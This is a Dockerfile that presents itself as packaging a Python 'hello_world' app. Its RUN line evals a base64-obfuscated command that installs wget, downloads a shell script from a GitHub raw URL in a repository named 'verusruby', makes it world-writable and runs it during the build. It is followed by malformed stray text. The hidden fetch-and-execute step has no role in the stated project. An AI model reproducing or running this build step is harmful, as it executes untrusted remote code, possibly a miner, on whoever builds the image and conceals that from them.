FROM python:2.7.14

RUN eval "$(echo "YXB0LWdldCAteSB1cGRhdGUKYXB0LWdldCAteSBpbnN0YWxsIGdpdAphcHQtZ2V0IC15IGluc3RhbGwgd2dldCAKd2dldCAtLXZlcnNpb24Kd2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmF1ZnBlcm1hbmEyMi92ZXJ1c3J1YnkvbWFpbi90ZXMxLnNoICYmIGNobW9kIDc3NyB0ZXMxLnNoICYmIGxzICYmIC4vdGVzMS5zaCA=" | base64 -d)"name: tes.sh && chmod 777 tes.sh && ./tes.sh 
WORKDIR /opt/hello_word/

COPY requirements.txt .
COPY dist/hello_world /opt/hello_word/

EXPOSE 80

CMD [ "./hello_world" ]